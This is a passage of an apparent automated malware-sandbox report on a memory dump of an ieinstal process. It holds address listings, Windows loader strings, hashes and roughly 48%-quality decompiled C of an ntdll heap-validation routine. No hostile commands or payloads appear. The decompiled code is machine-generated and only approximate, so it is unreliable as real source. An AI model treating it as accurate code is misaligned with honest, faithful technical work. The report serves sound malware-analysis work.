                                                                                                                0x1e6d2629
                                                                                                                0x1e6d262f
                                                                                                                0x1e6d2750
                                                                                                                0x1e6d2751
                                                                                                                0x1e6d2753
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d2758
                                                                                                                0x1e6d275c
                                                                                                                0x1e6d275f
                                                                                                                0x1e6d2777
                                                                                                                0x1e6d2761
                                                                                                                0x1e6d2764
                                                                                                                0x1e6d276d
                                                                                                                0x1e6d2772
                                                                                                                0x1e6d2772
                                                                                                                0x00000000
                                                                                                                0x1e6d263e
                                                                                                                0x1e6d2640
                                                                                                                0x1e6d2643
                                                                                                                0x1e6d26fc
                                                                                                                0x1e6d26ff
                                                                                                                0x1e6d2706
                                                                                                                0x1e6d2706
                                                                                                                0x00000000
                                                                                                                0x1e6d2706
                                                                                                                0x1e6d2701
                                                                                                                0x1e6d2704
                                                                                                                0x1e6d2711
                                                                                                                0x1e6d2713
                                                                                                                0x1e6d271c
                                                                                                                0x1e6d271f
                                                                                                                0x1e6d2723
                                                                                                                0x1e6d272b
                                                                                                                0x1e6d2734
                                                                                                                0x1e6d273d
                                                                                                                0x1e6d273e
                                                                                                                0x1e6d2744
                                                                                                                0x1e6d274a
                                                                                                                0x1e6d2715
                                                                                                                0x1e6d2715
                                                                                                                0x1e6d2715
                                                                                                                0x00000000
                                                                                                                0x1e6d2713
                                                                                                                0x00000000
                                                                                                                0x1e6d2649
                                                                                                                0x1e6d264c
                                                                                                                0x1e6d26f2
                                                                                                                0x1e6d2652
                                                                                                                0x1e6d2652
                                                                                                                0x1e6d2659
                                                                                                                0x1e6d2659
                                                                                                                0x1e6d277c
                                                                                                                0x1e6d277c
                                                                                                                0x1e6d2782
                                                                                                                0x1e6d2790
                                                                                                                0x1e6d2795
                                                                                                                0x1e6d2795
                                                                                                                0x1e6d2799
                                                                                                                0x1e6d279b
                                                                                                                0x1e6d27a6
                                                                                                                0x1e6d27ad
                                                                                                                0x1e6d27b4
                                                                                                                0x1e6d27b4
                                                                                                                0x00000000
                                                                                                                0x1e6d279b
                                                                                                                0x1e6d2643
                                                                                                                0x1e6d262f
                                                                                                                0x1e6d2621
                                                                                                                0x1e6d23fc
                                                                                                                0x1e6d23fd
                                                                                                                0x1e6d2402
                                                                                                                0x1e6d240b
                                                                                                                0x1e6d240c
                                                                                                                0x1e6d2412
                                                                                                                0x1e6d2413
                                                                                                                0x1e6d2419
                                                                                                                0x1e6d241d
                                                                                                                0x1e6d2468
                                                                                                                0x1e6d246e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d2474
                                                                                                                0x1e6d2474
                                                                                                                0x1e6d2474
                                                                                                                0x1e6d247e
                                                                                                                0x1e6d2481
                                                                                                                0x1e6d2483
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d2489
                                                                                                                0x1e6d2499
                                                                                                                0x1e6d249e
                                                                                                                0x1e6d24a2
                                                                                                                0x1e6d24a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d24aa
                                                                                                                0x1e6d24ae
                                                                                                                0x1e6d24b2
                                                                                                                0x1e6d24b3
                                                                                                                0x1e6d24b4
                                                                                                                0x1e6d24b5
                                                                                                                0x1e6d24bb
                                                                                                                0x1e6d24bd
                                                                                                                0x1e6d24be
                                                                                                                0x1e6d24c4
                                                                                                                0x1e6d24c6
                                                                                                                0x1e6d24c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d24ce
                                                                                                                0x1e6d24d4
                                                                                                                0x00000000
                                                                                                                0x1e6d24da
                                                                                                                0x1e6d24e8
                                                                                                                0x00000000
                                                                                                                0x1e6d24e8
                                                                                                                0x1e6d24d4
                                                                                                                0x1e6d2662
                                                                                                                0x00000000
                                                                                                                0x1e6d241f
                                                                                                                0x1e6d2421
                                                                                                                0x1e6d2425
                                                                                                                0x1e6d2425
                                                                                                                0x1e6d242b
                                                                                                                0x1e6d2548
                                                                                                                0x1e6d2549
                                                                                                                0x1e6d254b
                                                                                                                0x00000000
                                                                                                                0x1e6d254d
                                                                                                                0x1e6d2550
                                                                                                                0x1e6d2554
                                                                                                                0x1e6d2557
                                                                                                                0x1e6d256f
                                                                                                                0x1e6d2559
                                                                                                                0x1e6d255c
                                                                                                                0x1e6d2565
                                                                                                                0x1e6d256a
                                                                                                                0x1e6d256a
                                                                                                                0x00000000
                                                                                                                0x1e6d2557
                                                                                                                0x1e6d243a
                                                                                                                0x1e6d243c
                                                                                                                0x1e6d243f
                                                                                                                0x1e6d24f6
                                                                                                                0x1e6d24f9
                                                                                                                0x1e6d2500
                                                                                                                0x1e6d2500
                                                                                                                0x00000000
                                                                                                                0x1e6d2500
                                                                                                                0x1e6d24fb
                                                                                                                0x1e6d24fe
                                                                                                                0x1e6d2507
                                                                                                                0x1e6d250c
                                                                                                                0x1e6d250f
                                                                                                                0x1e6d2518
                                                                                                                0x1e6d251b
                                                                                                                0x1e6d251f
                                                                                                                0x1e6d2527
                                                                                                                0x1e6d2530
                                                                                                                0x1e6d2531
                                                                                                                0x1e6d253a
                                                                                                                0x1e6d253c
                                                                                                                0x1e6d2542
                                                                                                                0x1e6d2511
                                                                                                                0x1e6d2511
                                                                                                                0x1e6d2511
                                                                                                                0x00000000
                                                                                                                0x1e6d250f
                                                                                                                0x00000000
                                                                                                                0x1e6d2445
                                                                                                                0x1e6d2448
                                                                                                                0x1e6d24ef
                                                                                                                0x1e6d244e
                                                                                                                0x1e6d244e
                                                                                                                0x1e6d2455
                                                                                                                0x1e6d2455
                                                                                                                0x1e6d2574
                                                                                                                0x1e6d2574
                                                                                                                0x1e6d257a
                                                                                                                0x1e6d2588
                                                                                                                0x1e6d258d
                                                                                                                0x1e6d258d
                                                                                                                0x1e6d2591
                                                                                                                0x1e6d2593
                                                                                                                0x00000000
                                                                                                                0x1e6d2595
                                                                                                                0x1e6d2595
                                                                                                                0x1e6d259c
                                                                                                                0x1e6d25a8
                                                                                                                0x1e6d25a8
                                                                                                                0x1e6d25b7
                                                                                                                0x00000000
                                                                                                                0x1e6d25b9
                                                                                                                0x1e6d25c0
                                                                                                                0x1e6d25c2
                                                                                                                0x1e6d25c2
                                                                                                                0x00000000
                                                                                                                0x1e6d25c0
                                                                                                                0x1e6d25b7
                                                                                                                0x1e6d2593
                                                                                                                0x1e6d243f
                                                                                                                0x1e6d242b
                                                                                                                0x1e6d241d
                                                                                                                0x1e6d2239
                                                                                                                0x1e6d223a
                                                                                                                0x1e6d223f
                                                                                                                0x1e6d2248
                                                                                                                0x1e6d2249
                                                                                                                0x1e6d224f
                                                                                                                0x1e6d2250
                                                                                                                0x1e6d2256
                                                                                                                0x1e6d225a
                                                                                                                0x1e6d229b
                                                                                                                0x1e6d22a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d22a7
                                                                                                                0x1e6d22a7
                                                                                                                0x1e6d22a7
                                                                                                                0x1e6d22b1
                                                                                                                0x1e6d22b4
                                                                                                                0x1e6d22b6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d22bc
                                                                                                                0x1e6d22cc
                                                                                                                0x1e6d22d1
                                                                                                                0x1e6d22d5
                                                                                                                0x1e6d22d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d22dd
                                                                                                                0x1e6d22e1
                                                                                                                0x1e6d22e5
                                                                                                                0x1e6d22e6
                                                                                                                0x1e6d22e7
                                                                                                                0x1e6d22e8
                                                                                                                0x1e6d22ee
                                                                                                                0x1e6d22f0
                                                                                                                0x1e6d22f1
                                                                                                                0x1e6d22f7
                                                                                                                0x1e6d22f9
                                                                                                                0x1e6d22fb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6d2301
                                                                                                                0x1e6d2307
                                                                                                                0x00000000
                                                                                                                0x1e6d230d
                                                                                                                0x1e6d231b
                                                                                                                0x00000000
                                                                                                                0x1e6d231b
                                                                                                                0x1e6d2307
                                                                                                                0x1e6d245f
                                                                                                                0x00000000
                                                                                                                0x1e6d225c
                                                                                                                0x1e6d225e
                                                                                                                0x1e6d2262
                                                                                                                0x1e6d2262
                                                                                                                0x1e6d2268
                                                                                                                0x1e6d2380
                                                                                                                0x1e6d2381
                                                                                                                0x1e6d2383
                                                                                                                0x00000000
                                                                                                                0x1e6d2385
                                                                                                                0x1e6d2388
                                                                                                                0x1e6d238c
                                                                                                                0x1e6d238f
                                                                                                                0x1e6d23a7
                                                                                                                0x1e6d2391
                                                                                                                0x1e6d2394
                                                                                                                0x1e6d239d
                                                                                                                0x1e6d23a2
                                                                                                                0x1e6d23a2
                                                                                                                0x00000000
                                                                                                                0x1e6d238f
                                                                                                                0x1e6d2277
                                                                                                                0x1e6d2279
                                                                                                                0x1e6d227c
                                                                                                                0x1e6d232c
                                                                                                                0x1e6d232f
                                                                                                                0x1e6d2336
                                                                                                                0x1e6d2336
                                                                                                                0x00000000
                                                                                                                0x1e6d2336
                                                                                                                0x1e6d2331
                                                                                                                0x1e6d2334
                                                                                                                0x1e6d2341
                                                                                                                0x1e6d2343
                                                                                                                0x1e6d234c
                                                                                                                0x1e6d234f
                                                                                                                0x1e6d2353
                                                                                                                0x1e6d235b
                                                                                                                0x1e6d2364
                                                                                                                0x1e6d236d
                                                                                                                0x1e6d236e
                                                                                                                0x1e6d2374
                                                                                                                0x1e6d237a
                                                                                                                0x1e6d2345
                                                                                                                0x1e6d2345
                                                                                                                0x1e6d2345
                                                                                                                0x00000000
                                                                                                                0x1e6d2343
                                                                                                                0x00000000
                                                                                                                0x1e6d2282
                                                                                                                0x1e6d2285
                                                                                                                0x1e6d2322
                                                                                                                0x1e6d228b
                                                                                                                0x1e6d228b
                                                                                                                0x1e6d2292
                                                                                                                0x1e6d2292
                                                                                                                0x1e6d23ac
                                                                                                                0x1e6d23ac
                                                                                                                0x1e6d23b2
                                                                                                                0x1e6d23c0
                                                                                                                0x1e6d23c5
                                                                                                                0x1e6d23c5
                                                                                                                0x1e6d23c9
                                                                                                                0x1e6d23cb
                                                                                                                0x1e6d23d3
                                                                                                                0x1e6d23db
                                                                                                                0x1e6d23db
                                                                                                                0x00000000
                                                                                                                0x1e6d23cb
                                                                                                                0x1e6d227c
                                                                                                                0x1e6d2268
                                                                                                                0x1e6d225a

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-2160512332
                                                                                                                • Opcode ID: a4c0ddd59470d5fe069a6f64ac0a103b1afda3beeeaf5d654693dc7dfa644ec5
                                                                                                                • Instruction ID: 54ddc71604338231d75250635ace60f5db83dfe69202afddeac37a53f0f6e67a
                                                                                                                • Opcode Fuzzy Hash: a4c0ddd59470d5fe069a6f64ac0a103b1afda3beeeaf5d654693dc7dfa644ec5
                                                                                                                • Instruction Fuzzy Hash: 25925B75A04382ABD321CF15C890F5AB7E9BF89B24F904E1DFA94D7250D770E848CB96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E700E6D Relevance: 11.8, Strings: 9, Instructions: 515COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E1E700E6D(intOrPtr* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t215;
				signed int _t230;
				signed char _t236;
				intOrPtr _t237;
				unsigned int _t250;
				signed int _t251;
				intOrPtr _t257;
				intOrPtr _t267;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t298;
				intOrPtr _t304;
				signed int* _t308;
				intOrPtr* _t309;
				intOrPtr* _t310;
				signed int _t317;
				signed int _t319;
				signed short _t322;
				signed short _t325;
				signed int _t327;
				signed int _t330;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				void* _t338;
				signed int _t344;
				intOrPtr* _t345;
				signed int _t352;
				signed int _t354;
				signed char _t356;
				signed int* _t357;
				signed int _t372;
				signed int _t374;
				signed int _t376;
				signed int _t379;
				signed char _t384;
				intOrPtr* _t387;
				signed int _t389;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t394;
				intOrPtr _t399;
				intOrPtr* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t416;

				_t345 = __ecx;
				_v16 = _v16 & 0x00000000;
				_t194 = 0;
				_v8 = _v8 & 0;
				_t344 = __edx;
				_v12 = 0;
				_t401 = __ecx;
				_t402 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t403 = _v16;
					if( *((intOrPtr*)(_t344 + 0x2c)) == _t403) {
						__eflags =  *((intOrPtr*)(_t344 + 0x30)) - _t194;
						if( *((intOrPtr*)(_t344 + 0x30)) == _t194) {
							L107:
							return 1;
						}
						_t196 =  *[fs:0x30];
						__eflags =  *(_t196 + 0xc);
						if( *(_t196 + 0xc) == 0) {
							_push("HEAP: ");
							E1E64B910();
						} else {
							E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t344 + 0x30)));
						_push(_t344);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E1E64B910();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1E64B910();
					} else {
						E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t403);
					_push( *((intOrPtr*)(_t344 + 0x2c)));
					_push(_t344);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t402;
					if( *(_t401 + 0x4c) != 0) {
						 *_t402 =  *_t402 ^  *(_t401 + 0x50);
						_t411 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
						if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
							_push(_t345);
							E1E70D646(_t344, _t401, _t402, _t401, _t402, _t411);
						}
					}
					if(_v8 != ( *(_t402 + 4) ^  *(_t401 + 0x54))) {
						_t215 =  *[fs:0x30];
						__eflags =  *(_t215 + 0xc);
						if( *(_t215 + 0xc) == 0) {
							_push("HEAP: ");
							E1E64B910();
						} else {
							E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t352 =  *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff;
						__eflags = _t352;
						_push(_t352);
						E1E64B910("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t402);
						L117:
						__eflags =  *(_t401 + 0x4c);
						if( *(_t401 + 0x4c) != 0) {
							 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
							 *_t402 =  *_t402 ^  *(_t401 + 0x50);
							__eflags =  *_t402;
						}
						goto L119;
					}
					_t230 =  *_t402 & 0x0000ffff;
					_t384 =  *(_t402 + 2);
					_t354 = _t230;
					_v8 = _t354;
					_v20 = _t354;
					_v28 = _t230 << 3;
					if((_t384 & 0x00000001) == 0) {
						__eflags =  *(_t401 + 0x40) & 0x00000040;
						_t356 = (_t354 & 0xffffff00 | ( *(_t401 + 0x40) & 0x00000040) != 0x00000000) & _t384 >> 0x00000002;
						__eflags = _t356 & 0x00000001;
						if((_t356 & 0x00000001) == 0) {
							L66:
							_t357 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t357 =  *_t357 + ( *_t402 & 0x0000ffff);
							__eflags =  *_t357;
							L67:
							_t236 =  *(_t402 + 6);
							if(_t236 == 0) {
								_t345 = _t401;
							} else {
								_t345 = (_t402 & 0xffff0000) - ((_t236 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t345 != _t344) {
								_t237 =  *[fs:0x30];
								__eflags =  *(_t237 + 0xc);
								if( *(_t237 + 0xc) == 0) {
									_push("HEAP: ");
									E1E64B910();
								} else {
									E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t402 + 6) & 0x000000ff);
								_push(_t402);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t402 + 7)) != 3) {
									__eflags =  *(_t401 + 0x4c);
									if( *(_t401 + 0x4c) != 0) {
										 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										__eflags =  *_t402;
									}
									_t402 = _t402 + _v28;
									__eflags = _t402;
									goto L86;
								}
								_t250 =  *(_t402 + 0x1c);
								if(_t250 == 0) {
									_t251 =  *_t402 & 0x0000ffff;
									__eflags = _t402 + _t251 * 8 -  *((intOrPtr*)(_t344 + 0x28));
									if(_t402 + _t251 * 8 ==  *((intOrPtr*)(_t344 + 0x28))) {
										__eflags =  *(_t401 + 0x4c);
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											__eflags =  *_t402;
										}
										goto L107;
									}
									_t257 =  *[fs:0x30];
									__eflags =  *(_t257 + 0xc);
									if( *(_t257 + 0xc) == 0) {
										_push("HEAP: ");
										E1E64B910();
									} else {
										E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t344 + 0x28)));
									_push(_t402);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E1E64B910();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t250 >> 0xc);
								if( *(_t401 + 0x4c) != 0) {
									 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
									 *_t402 =  *_t402 ^  *(_t401 + 0x50);
								}
								_t402 = _t402 + 0x20 +  *(_t402 + 0x1c);
								if(_t402 ==  *((intOrPtr*)(_t344 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t401 + 0x4c) != 0) {
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										_t429 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
										if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
											_push(_t345);
											_t345 = _t401;
											E1E70D646(_t344, _t345, _t402, _t401, _t402, _t429);
										}
									}
									if( *(_t401 + 0x54) !=  *(_t402 + 4)) {
										_t267 =  *[fs:0x30];
										__eflags =  *(_t267 + 0xc);
										if( *(_t267 + 0xc) == 0) {
											_push("HEAP: ");
											E1E64B910();
										} else {
											E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff);
										_push(_t402);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t291 = _v28 + 0xfffffff0;
						_v24 = _t291;
						__eflags = _t384 & 0x00000002;
						if((_t384 & 0x00000002) != 0) {
							__eflags = _t291 - 4;
							if(_t291 > 4) {
								_t291 = _t291 - 4;
								__eflags = _t291;
								_v24 = _t291;
							}
						}
						__eflags = _t384 & 0x00000008;
						if((_t384 & 0x00000008) == 0) {
							_t105 = _t402 + 0x10; // -8
							_t293 = E1E6A80A0(_t105, _t291, 0xfeeefeee);
							_v20 = _t293;
							__eflags = _t293 - _v24;
							if(_t293 != _v24) {
								_t294 =  *[fs:0x30];
								__eflags =  *(_t294 + 0xc);
								if( *(_t294 + 0xc) == 0) {
									_push("HEAP: ");
									E1E64B910();
								} else {
									E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _v20 + 8 + _t402;
								__eflags = _t298;
								_push(_t298);
								_push(_t402);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t372 =  *((intOrPtr*)(_t402 + 8));
							_t387 =  *((intOrPtr*)(_t402 + 0xc));
							_v24 = _t372;
							_v28 = _t387;
							_t304 =  *((intOrPtr*)(_t372 + 4));
							__eflags =  *_t387 - _t304;
							if( *_t387 != _t304) {
								L64:
								_push(0);
								_push( *_t387);
								_push(_t304);
								_t104 = _t402 + 8; // -16
								_t345 = 0xd;
								E1E715FED(_t345, _t401);
								goto L86;
							}
							_t59 = _t402 + 8; // -16
							__eflags =  *_t387 - _t59;
							_t374 = _v24;
							if( *_t387 != _t59) {
								goto L64;
							}
							 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) - _v20;
							_t389 =  *(_t401 + 0xb4);
							__eflags = _t389;
							if(_t389 == 0) {
								L35:
								_t308 = _v28;
								 *_t308 = _t374;
								 *(_t374 + 4) = _t308;
								__eflags =  *(_t402 + 2) & 0x00000008;
								if(( *(_t402 + 2) & 0x00000008) == 0) {
									L39:
									_t375 =  *_t402 & 0x0000ffff;
									_t309 = _t401 + 0xc0;
									_v28 =  *_t402 & 0x0000ffff;
									 *(_t402 + 2) = 0;
									 *((char*)(_t402 + 7)) = 0;
									__eflags =  *(_t401 + 0xb4);
									if( *(_t401 + 0xb4) == 0) {
										_t345 =  *_t309;
									} else {
										_t345 = E1E651C0E(_t401, _t375);
										_t309 = _t401 + 0xc0;
									}
									__eflags = _t309 - _t345;
									if(_t309 == _t345) {
										L51:
										_t310 =  *((intOrPtr*)(_t345 + 4));
										__eflags =  *_t310 - _t345;
										if( *_t310 != _t345) {
											_push(0);
											_push( *_t310);
											__eflags = 0;
											_push(0);
											_push(_t345);
											_t345 = 0xd;
											E1E715FED(_t345, 0);
										} else {
											_t90 = _t402 + 8; // -16
											_t393 = _t90;
											 *_t393 = _t345;
											 *((intOrPtr*)(_t393 + 4)) = _t310;
											 *_t310 = _t393;
											 *((intOrPtr*)(_t345 + 4)) = _t393;
										}
										 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) + ( *_t402 & 0x0000ffff);
										_t392 =  *(_t401 + 0xb4);
										__eflags = _t392;
										if(_t392 == 0) {
											L61:
											__eflags =  *(_t401 + 0x4c);
											if(__eflags != 0) {
												 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
												 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											}
											goto L86;
										} else {
											_t376 =  *_t402 & 0x0000ffff;
											while(1) {
												__eflags = _t376 -  *((intOrPtr*)(_t392 + 4));
												if(_t376 <  *((intOrPtr*)(_t392 + 4))) {
													break;
												}
												_t317 =  *_t392;
												__eflags = _t317;
												if(_t317 == 0) {
													_t319 =  *((intOrPtr*)(_t392 + 4)) - 1;
													L60:
													_t97 = _t402 + 8; // -16
													_t345 = _t401;
													E1E651B5D(_t345, _t392, 1, _t97, _t319, _t376);
													goto L61;
												}
												_t392 = _t317;
											}
											_t319 = _t376;
											goto L60;
										}
									} else {
										_t394 =  *(_t401 + 0x4c);
										while(1) {
											__eflags = _t394;
											if(_t394 == 0) {
												_t322 =  *(_t345 - 8) & 0x0000ffff;
											} else {
												_t325 =  *(_t345 - 8);
												_t394 =  *(_t401 + 0x4c);
												__eflags = _t394 & _t325;
												if((_t394 & _t325) != 0) {
													_t325 = _t325 ^  *(_t401 + 0x50);
													__eflags = _t325;
												}
												_t322 = _t325 & 0x0000ffff;
											}
											__eflags = _v28 - (_t322 & 0x0000ffff);
											if(_v28 <= (_t322 & 0x0000ffff)) {
												goto L51;
											}
											_t345 =  *_t345;
											__eflags = _t401 + 0xc0 - _t345;
											if(_t401 + 0xc0 != _t345) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t327 = E1E64F5C7(_t401, _t402);
								__eflags = _t327;
								if(_t327 != 0) {
									goto L39;
								}
								_t345 = _t401;
								E1E64F113(_t345, _t402,  *_t402 & 0x0000ffff, 1);
								goto L86;
							}
							_t379 =  *_t402 & 0x0000ffff;
							while(1) {
								__eflags = _t379 -  *((intOrPtr*)(_t389 + 4));
								if(_t379 <  *((intOrPtr*)(_t389 + 4))) {
									break;
								}
								_t330 =  *_t389;
								__eflags = _t330;
								if(_t330 == 0) {
									_t332 =  *((intOrPtr*)(_t389 + 4)) - 1;
									L34:
									_t66 = _t402 + 8; // -16
									E1E66036A(_t401, _t389, 1, _t66, _t332, _t379);
									_t374 = _v24;
									goto L35;
								}
								_t389 = _t330;
							}
							_t332 = _t379;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t402 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E1E6FD62C(_t401, _t402) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t384 & 0x00000002) == 0) {
							_t336 =  *(_t402 + 3) & 0x000000ff;
						} else {
							_t338 = E1E683AE9(_t402);
							_t354 = _v20;
							_t336 =  *(_t338 + 2) & 0x0000ffff;
						}
						_t416 = _t336;
						if(_t416 == 0) {
							goto L18;
						}
						if(_t416 >= 0) {
							__eflags = _t336 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t336 -  *((intOrPtr*)(_t401 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t399 = _a20;
							_t337 = _t336 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t399 + _t337 * 4)) =  *((intOrPtr*)(_t399 + _t337 * 4)) + _t354;
							goto L18;
						}
						_t337 = _t336 & 0x00007fff;
						if(_t337 >= 0x81) {
							goto L18;
						}
						_t399 = _a24;
						goto L17;
					}
					L86:
				} while (_t402 <  *((intOrPtr*)(_t344 + 0x28)));
				_t194 = _v12;
				goto L88;
			}






























































                                                                                                                0x1e700e6d
                                                                                                                0x1e700e75
                                                                                                                0x1e700e79
                                                                                                                0x1e700e7b
                                                                                                                0x1e700e7f
                                                                                                                0x1e700e81
                                                                                                                0x1e700e86
                                                                                                                0x1e700e88
                                                                                                                0x1e700e8d
                                                                                                                0x1e701221
                                                                                                                0x1e701221
                                                                                                                0x1e701227
                                                                                                                0x1e701434
                                                                                                                0x1e701437
                                                                                                                0x1e701357
                                                                                                                0x00000000
                                                                                                                0x1e701357
                                                                                                                0x1e70143d
                                                                                                                0x1e701443
                                                                                                                0x1e701447
                                                                                                                0x1e701466
                                                                                                                0x1e70146b
                                                                                                                0x1e701449
                                                                                                                0x1e70145e
                                                                                                                0x1e701463
                                                                                                                0x1e701471
                                                                                                                0x1e701474
                                                                                                                0x1e701477
                                                                                                                0x1e701478
                                                                                                                0x1e70142a
                                                                                                                0x1e70142a
                                                                                                                0x1e70140e
                                                                                                                0x00000000
                                                                                                                0x1e70140e
                                                                                                                0x1e701237
                                                                                                                0x1e701415
                                                                                                                0x1e70141a
                                                                                                                0x1e70123d
                                                                                                                0x1e701252
                                                                                                                0x1e701257
                                                                                                                0x1e701420
                                                                                                                0x1e701421
                                                                                                                0x1e701424
                                                                                                                0x1e701425
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700e93
                                                                                                                0x1e700e93
                                                                                                                0x1e700e9a
                                                                                                                0x1e700e9c
                                                                                                                0x1e700ea1
                                                                                                                0x1e700eab
                                                                                                                0x1e700eae
                                                                                                                0x1e700eb0
                                                                                                                0x1e700eb5
                                                                                                                0x1e700eb5
                                                                                                                0x1e700eae
                                                                                                                0x1e700ec6
                                                                                                                0x1e7013a4
